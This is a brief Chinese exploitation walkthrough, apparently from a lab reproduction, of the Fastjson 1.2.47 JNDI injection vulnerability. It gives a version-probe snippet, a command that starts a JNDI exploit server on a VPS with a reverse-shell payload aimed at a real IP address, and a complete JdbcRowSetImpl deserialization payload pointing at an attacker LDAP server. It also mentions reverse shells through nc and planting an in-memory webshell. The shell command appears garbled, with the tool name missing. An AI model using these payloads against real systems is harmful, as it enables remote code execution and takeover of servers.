Fastjson 1247-jndi
复现过程
依旧是探测一下 fastjson 的版本,使用:
{
"@type": "java.lang.AutoCloseable"
关于这种方式探测fastjosn版本,条件是需要response中会回显报错信息,但实际环境可能存在不回显的情况,那就需要利用其他手段了
那么已知fastjson版本为1.2.47,那么我们就可以尝试利用fastjson的JNDI特性来执行命令了。
这次使用的是 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具来执行命令。
在 vps 上开启服务:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C " 47.113.221.99 8080 -e sh" -A 47.113.221.99
paylaod:
{"@type":"com.alibaba.fastjson.JSONObject",{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://47.113.221.99:1389/4ardp9",
"autoCommit":true
}
}}""}
这里他是没有 bash 的,所以使用 nc 来反弹命令,这里我 sh 也弹不出来。当然这里打一个内存马也是可以的。
